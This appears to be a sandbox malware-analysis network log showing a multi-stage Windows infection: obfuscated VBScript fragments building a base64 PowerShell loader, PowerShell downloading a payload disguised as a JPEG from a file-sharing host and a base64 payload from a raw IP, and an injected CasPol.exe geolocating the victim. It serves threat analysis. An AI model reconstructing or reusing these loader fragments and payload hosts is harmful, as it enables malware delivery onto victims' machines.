                                                                                                          Nov 20, 2024 17:18:14.218704939 CET1236INData Raw: 00 45 00 33 00 4d 00 7a 00 41 00 35 00 4e 00 44 00 55 00 78 00 4e 00 7a 00 5a 00 68 00 4d 00 44 00 6b 00 77 00 4e 00 47 00 59 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 67 00 61 00 57 00 5a 00 6b
                                                                                                          Data Ascii: E3MzA5NDUxNzZhMDkwNGYBWDCJXRASYMEQGUgaWZkOBWDCJXRASYMEQGU29waXdlYkNsaWVuBWDCJXRASYMEQGUdCA9IE5ldyBWDCJXRASYMEQGU1PYmplY3Q
                                                                                                          Nov 20, 2024 17:18:14.218740940 CET1236INData Raw: 00 63 00 70 00 4f 00 32 00 39 00 77 00 61 00 57 00 56 00 75 00 5a 00 45 00 6c 00 75 00 5a 00 47 00 56 00 34 00 49 00 44 00 30 00 67 00 62 00 33 00 42 00 70 00 61 00 57 00 31 00 68 00 5a 00 32 00 56 00 55 00 5a 00 58 00 68 00 30 00 4c 00 6b 00 6c
                                                                                                          Data Ascii: cpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3Rhc" reiterativo = reiterativo & "nRJbmR
                                                                                                          Nov 20, 2024 17:18:14.218775988 CET1236INData Raw: 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 69 00 59 00 58 00 4e 00 6c 00 4e 00 6a 00 52 00 44 00 62 00 32 00 31 00 74 00 59 00 57 00 35 00 6b 00 4c 00 6c 00 52 00 76 00 51 00 32 00 68 00 68 00 63 00 6b 00 46 00 79 00 63 00 6d
                                                                                                          Data Ascii: XRASYMEQGUiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEBWDCJXRASYMEQGUZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGl
                                                                                                          Nov 20, 2024 17:18:14.218810081 CET1236INData Raw: 00 69 00 74 00 65 00 72 00 61 00 74 00 69 00 76 00 6f 00 20 00 26 00 20 00 22 00 77 00 73 00 49 00 45 00 41 00 6f 00 61 00 57 00 5a 00 6b 00 64 00 48 00 68 00 30 00 4c 00 6b 00 64 00 45 00 52 00 46 00 4a 00 45 00 53 00 43 00 38 00 31 00 4e 00 43
                                                                                                          Data Ascii: iterativo & "wsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMyBWDCJXRASYMEQGU4yOTEvBWDCJXRASYMEQGULzpwdHRoaWZkLCBBWDCJXRASYMEQ
                                                                                                          Nov 20, 2024 17:18:14.218844891 CET1236INData Raw: 00 6a 00 51 00 70 00 4c 00 6e 00 4a 00 6c 00 55 00 45 00 78 00 42 00 51 00 32 00 55 00 6f 00 4a 00 32 00 6c 00 6d 00 5a 00 43 00 63 00 73 00 57 00 31 00 4e 00 30 00 63 00 6d 00 6c 00 75 00 52 00 31 00 31 00 62 00 51 00 32 00 68 00 42 00 63 00 6c
                                                                                                          Data Ascii: jQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp" D
                                                                                                          Nov 20, 2024 17:18:14.218879938 CET1236INData Raw: 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 24 00 4f 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73
                                                                                                          Data Ascii: SYMEQGU$OBWDCJXRASYMEQGU" momposteiro = momposteiro & "WBWDCJXRASYMEQGUj" momposteiro = momposteiro & "
                                                                                                          Nov 20, 2024 17:18:14.218911886 CET1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 3d 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 26 00 20 00 22 00 67 00 42 00 57 00 44 00 43 00 4a 00 58
                                                                                                          Data Ascii: momposteiro = momposteiro & "gBWDCJXRASYMEQGU]:" momposteiro = momposteiro & ":UTBWDCJXRASYMEQGU"
                                                                                                          Nov 20, 2024 17:18:14.218946934 CET1236INData Raw: 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 6f 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 3d 00 20 00 6d 00 6f 00 6d 00 70 00 6f
                                                                                                          Data Ascii: XRASYMEQGUo" momposteiro = momposteiro & "mbBWDCJXRASYMEQGUas" momposteiro = momposteiro & "eBWDCJXRASY
                                                                                                          Nov 20, 2024 17:18:14.341175079 CET1236INData Raw: 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 3d 00 20 00 6d 00 6f 00 6d 00 70 00 6f 00 73 00 74 00 65 00 69 00 72 00 6f 00 20 00 26 00 20 00 22 00 78 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 65
                                                                                                          Data Ascii: steiro = momposteiro & "xBWDCJXRASYMEQGUe -wiBWDCJXRASYMEQGUn" momposteiro = momposteiro & "dBWDCJXRASYMEQGUowBW


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.749765192.3.220.29807724C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 20, 2024 17:18:44.187983036 CET75OUTGET /45/HDRDDG.txt HTTP/1.1
                                                                                                          Host: 192.3.220.29
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 20, 2024 17:18:45.308274031 CET1236INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 20 Nov 2024 16:18:44 GMT
                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                          Last-Modified: Wed, 20 Nov 2024 06:25:06 GMT
                                                                                                          ETag: "a0800-6275235f113e8"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 657408
                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: text/plain
                                                                                                          Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                          Nov 20, 2024 17:18:45.308440924 CET224INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                          Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5
                                                                                                          Nov 20, 2024 17:18:45.308454990 CET1236INData Raw: 51 5a 4f 45 6d 44 62 35 51 57 4f 67 6c 44 58 35 77 55 4f 49 6c 44 4f 35 41 53 4f 59 6b 44 46 35 41 52 4f 4d 6b 44 43 34 67 50 4f 30 6a 44 35 34 77 4d 4f 45 6a 44 77 34 77 4c 4f 34 69 44 71 34 51 4b 4f 55 69 44 66 34 51 48 4f 77 68 44 59 34 67 45
                                                                                                          Data Ascii: QZOEmDb5QWOglDX5wUOIlDO5ASOYkDF5AROMkDC4gPO0jD54wMOEjDw4wLO4iDq4QKOUiDf4QHOwhDY4gEOAhDP4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZN
                                                                                                          Nov 20, 2024 17:18:45.308470011 CET1236INData Raw: 31 44 5a 39 77 56 50 55 31 44 54 39 51 55 50 38 30 44 4e 39 77 53 50 6b 30 44 48 39 51 52 50 4d 30 44 42 38 77 50 50 30 7a 44 37 38 51 4f 50 63 7a 44 31 38 77 4d 50 45 7a 44 76 38 51 4c 50 73 79 44 70 38 77 4a 50 55 79 44 6a 38 51 49 50 38 78 44
                                                                                                          Data Ascii: 1DZ9wVPU1DT9QUP80DN9wSPk0DH9QRPM0DB8wPP0zD78QOPczD18wMPEzDv8QLPsyDp8wJPUyDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl
                                                                                                          Nov 20, 2024 17:18:45.308486938 CET1236INData Raw: 77 52 50 59 30 44 45 39 67 41 41 41 41 41 58 41 55 41 73 41 73 44 69 37 51 34 4f 41 75 44 66 37 67 33 4f 30 74 44 63 37 77 32 4f 6f 74 44 5a 37 41 32 4f 63 74 44 57 37 51 31 4f 51 74 44 54 37 67 30 4f 45 74 44 51 37 77 7a 4f 34 73 44 4e 37 41 7a
                                                                                                          Data Ascii: wRPY0DE9gAAAAAXAUAsAsDi7Q4OAuDf7g3O0tDc7w2OotDZ7A2OctDW7Q1OQtDT7g0OEtDQ7wzO4sDN7AzOssDK7QyOgsDH7gxOUsDE7wwOIsDB7AgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO
                                                                                                          Nov 20, 2024 17:18:45.308501959 CET1236INData Raw: 76 44 78 37 77 37 4f 30 75 44 72 37 51 36 4f 63 75 44 6c 37 77 34 4f 45 75 44 66 37 51 33 4f 73 74 44 5a 37 77 31 4f 55 74 44 54 37 51 30 4f 38 73 44 4e 37 77 79 4f 6b 73 44 48 37 51 78 4f 4d 73 44 42 36 77 76 4f 30 72 44 37 36 51 75 4f 63 72 44
                                                                                                          Data Ascii: vDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD9
                                                                                                          Nov 20, 2024 17:18:45.308516979 CET1236INData Raw: 49 34 4f 34 74 6a 62 37 55 32 4f 2b 73 6a 4e 37 38 68 4f 37 72 7a 76 36 45 6f 4f 45 70 44 43 35 6b 66 4f 71 6e 7a 74 35 38 4b 4f 72 6a 7a 34 34 73 4e 4f 54 69 6a 62 34 77 45 4f 6e 67 44 47 34 6b 77 4e 30 55 6a 35 31 34 54 4e 69 51 6a 62 30 45 46
                                                                                                          Data Ascii: I4O4tjb7U2O+sjN78hO7rzv6EoOEpDC5kfOqnzt58KOrjz44sNOTijb4wEOngDG4kwN0Uj514TNiQjb0EFM1CzrwsJM9BzawYGAAAA8AUAYA8DE+wtPr6TR9oVPL1zP98SPS0jC8AOPZyTe80GPhxTT8E0Ofvz17k7OxuTq7E6OZujS74SOhmzl50WOghj/40OOnjj44wNO+iTt4wKOXizE3o/NyeDo3M5NIeDZ3QzNncTD2IqN
                                                                                                          Nov 20, 2024 17:18:45.308532000 CET1236INData Raw: 47 44 6d 78 73 47 4d 31 41 41 41 41 77 48 41 45 41 4e 41 2f 49 2f 50 52 2f 54 79 2f 45 37 50 64 36 44 30 2b 45 71 50 78 30 6a 35 39 34 64 50 69 31 7a 57 39 73 42 50 38 79 7a 6a 38 77 45 50 42 78 44 4f 38 51 78 4f 75 76 6a 35 37 63 34 4f 2f 74 7a
                                                                                                          Data Ascii: GDmxsGM1AAAAwHAEANA/I/PR/Ty/E7Pd6D0+EqPx0j594dPi1zW9sBP8yzj8wEPBxDO8QxOuvj57c4O/tzT74jORqDJ6QQOVnTz5UbOpmjY54UOUgDs4UGOchzU40DOxgzE4sAOAcz93E+NLfDk3U4N8dzS3MkN2aTp2UpNNaDf2wWNrVjF1YANpTTdzA8MZJT0yQoM5JTZygkMREzzx4JMiCzkwcIM3BjWwIFMoAAAAgKAEAMA
                                                                                                          Nov 20, 2024 17:18:45.308590889 CET1236INData Raw: 49 43 4e 58 4d 7a 2b 7a 45 2f 4d 57 50 54 30 7a 77 38 4d 42 50 6a 6a 7a 6f 32 4d 6c 4e 44 59 7a 55 31 4d 34 4d 44 46 79 41 75 4d 2f 4b 7a 70 79 49 71 4d 64 4b 6a 6b 79 41 6f 4d 65 4a 44 55 79 51 6b 4d 31 49 44 48 78 55 66 4d 74 48 6a 31 78 59 63
                                                                                                          Data Ascii: ICNXMz+zE/MWPT0zw8MBPjjzo2MlNDYzU1M4MDFyAuM/KzpyIqMdKjkyAoMeJDUyQkM1IDHxUfMtHj1xYcMKGjgxUWMgFzWxYQMBAz7wgOMiDz2wELMXCzgwsHMvBjUwgEMlAzGwYAAAEAmAQAcA8T9/M9PJ/Dv/M7PZ+Di/M1PK9TO/0yPS8TA+wsPF7Dm+EZPY3DX9gEPMxTA7E9OguDU7MzOtoz760tOXjz23M7MxPTjxIGM
                                                                                                          Nov 20, 2024 17:18:45.308609009 CET1236INData Raw: 76 7a 4a 37 73 67 4f 79 71 44 6d 30 6b 31 4d 32 50 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 58 77 45 4b 41 41 41 41 50 41 4d 41 30 41 34 44 52 78 77 58 4d 34 46 44 64 78 41 58 4d 73 46 44
                                                                                                          Data Ascii: vzJ7sgOyqDm0k1M2PDpzA6McODmzQ5MQODjzg4MEODgzw3M4NDXwEKAAAAPAMA0A4DRxwXM4FDdxAXMsFDaxQWMgBD1wwFMYBDVwAFMMBDSwQEMABAAAwCADAMA/Q7P88DO/QzPw8DL/gyPk8DI+cpPg4DH+ghPU4DE+wgPI4DB98GP4zD98APPszD68QOPgzD38MlO/qTr6soO2pjV6QUOngjaxgLM8AAAAQFADALA+AsPW0Tx
                                                                                                          Nov 20, 2024 17:18:45.430066109 CET1236INData Raw: 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75 36 44 71 2b 49 71 50 63 36 7a 6c 2b 45 70 50 4b 36 54 68 2b 41 6f 50 36 35 44 64 2b 34 6d 50 70 35 7a 59 2b 30 6c
                                                                                                          Data Ascii: owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6Dq+IqPc6zl+EpPK6Th+AoP65Dd+4mPp5zY+0lPX5jU+wkPG5DQ+sjP14zL+kiPk4jH+ghPS4TD+cgPB0z+9YfPw3j69QePf3T29MdPN3Dy9IcP82jt9EbPr2Tp98ZPa2Dl94YPI2zg90XP31Tc9wWPm1DY9oVPV1zT9kUPD1jP9gTPx0jK9QSPc0jD8kuOypza68lO


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.749779178.237.33.50808052C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 20, 2024 17:18:50.131928921 CET71OUTGET /json.gp HTTP/1.1
                                                                                                          Host: geoplugin.net
                                                                                                          Cache-Control: no-cache
                                                                                                          Nov 20, 2024 17:18:51.453716040 CET1170INHTTP/1.1 200 OK
                                                                                                          date: Wed, 20 Nov 2024 16:18:51 GMT
                                                                                                          server: Apache
                                                                                                          content-length: 962
                                                                                                          content-type: application/json; charset=utf-8
                                                                                                          cache-control: public, max-age=300
                                                                                                          access-control-allow-origin: *
                                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                          Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.749713142.215.209.784437724C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-11-20 16:18:22 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                          Host: 1017.filemail.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-11-20 16:18:23 UTC324INHTTP/1.1 200 OK
                                                                                                          Content-Length: 2230233
                                                                                                          Content-Type: image/jpeg
                                                                                                          Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                          X-Transfer-ID: wxhdiueivoluihj
                                                                                                          Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                          Date: Wed, 20 Nov 2024 16:18:22 GMT
                                                                                                          Connection: close
                                                                                                          2024-11-20 16:18:23 UTC3719INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 61 7e f8 15 fb 43 e2 b1 21 8f 43 e1 e4 33 83 40 a9 fc 38 be 83 ec b3 eb 60 6d 46 b6 66 59 18 fa 6b 9e 30 3f 67 bc 14 cd 33 4f a8 57 0c 87 81 ef f5 cf 61 0b 34 76 ad f8 41 ae 7b 60 29 e1 9e 14 9e 1b 03 44 8a 18 5e e0 cd d7 09 2a bb a5 d9 b5 27 d2 38 c7 84 88 c6 b7 ad fb 5e 55 d5 5d 48 2c 0f 5e 9c 60 26 fb 21 8a e4 53 67 8e 05 f5 18 ab 6b dd 26 69 4e a0 96 54 09 1a aa ed 53 c5 10 c0 e2 da e5 95 d9 96 33 b8 df 42 dc 0c ce 7d 3c c8 68 ee e3 93 5c 8c 0d 57 f0 ed 06 b3 42 16 48 4f de 1d bd 2a 83 75 12 78 1f 0e 2f 32 75 3f 66 5d 21 96 3d 2b ca ce 42 ee 5e 36 92 3a 83 df 8c 14 52 48 cd b0 3b 2b 86 e7 92 3f eb 8f e9 75 7a ed 38 2f 16 a1 57 aa 32 df 26 cf 4a 3c fd 70 32 bc 0e 0d 6e 8b c4 c3 b0 29 1c 7f f7 a3 77 55 cf af e9 7c 5a 49 f4 4a 16 25 68 f6 8d b2 15 14 bc
                                                                                                          Data Ascii: a~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B}<h\WBHO*ux/2u?f]!=+B^6:RH;+?uz8/W2&J<p2n)wU|ZIJ%h
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d b1 0d 36 9d e2 58 b5 60 09 42 9f 52 8e 28 9e 07 ea 46 07 a9 56 b6 26 89 2b ec 78 e9 ed 92 5d 89 a2 68 66 46 97 c4 65 9b c4 8c 52 a8 89 69 86 c1 ef c7 5b 19 a3 a9 79 34 f0 86 8e 31 2b dd 6d 26 80 c0 30 00 59 20 57 b9 ca a9 de b6 18 b0 3d 3d b3 1d bc 4e 78 3c 18 cf 20 06 49 5b 6c 6b 5c 02 6e b9 f6 eb 87 9f 4d e2 6d 0f 99 0e b8 34 86 ed 55 56 af b8 07 03 40 09 37 72 48 f6 ac 29 91 c8 0c c0 0a 1c 57 7f 9e 23 e1 52 6a df 4b bf 56 de b2 68 02 a0 1f 6e d8 fb 80 c4 03 db 03 cc 78 9c 1a d8 b5 5a a7 d3 24 a2 19 54 bc ad b8 10 7d 26 f3 36 46 68 51 95 26 32 2b 9a 65 45 71 c0 e9 76 a0 7f 3c f5 fa d8 47 fb 2b 5a 47 4f
                                                                                                          Data Ascii: H?I?U/;I>A$Gsl76?!F{p6X`BR(FV&+x]hfFeRi[y41+m&0Y W==Nx< I[lk\nMm4UV@7rH)W#RjKVhnxZ$T}&6FhQ&2+eEqv<G+ZGO
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64 94 2e a1 11 4e d2 08 f4 b5 d7 16 45 57 be 63 ea 9b 73 04 e4 8a ae 2b fa e0 66 3a ee 86 c1 b3 d0 8c 17 dd 9b 63 28 16 18 5d 7b 67 a9 7d 3f d9 b5 50 ac be 2a 03 73 e9 f2 c5 f0 3a 58 ca eb 7c 13 4e da 13 af f0 2d 44 ba 88 a2 03 ef 10 cd ff 00 7b 15 8f c5 b6 85 8f 88 f6 3e c7 03 c9 26 9b ca 05 49 e0 0b bf 7c e9 62 67 88 5a 31 65 1c 10 3b 7b 66 ab 03 e4 aa 3a 2f 99 7d 72 8f a5 6d cc 19 d3 72 ae e2 09 23 8e bf 5c 0c 54 0c d1 0d d6 1b bd f7 c9 88 38 9c 39 27 6a 8e 95 9a 6f a0 91 e6 55 52 80 32 ee 00 df 35 ce 28 90 32 44 fa 80 c9 4a 69 97 75 92 a7 8f a6 04 8d 42 ba b8 60 19 4b 28 04 76 eb 83 25 ba a1 dc 2f 82 07
                                                                                                          Data Ascii: /ER;UM'IlWLPOj=}O*d.NEWcs+f:c(]{g}?P*s:X|N-D{>&I|bgZ1e;{f:/}rmr#\T89'joUR25(2DJiuB`K(v%/
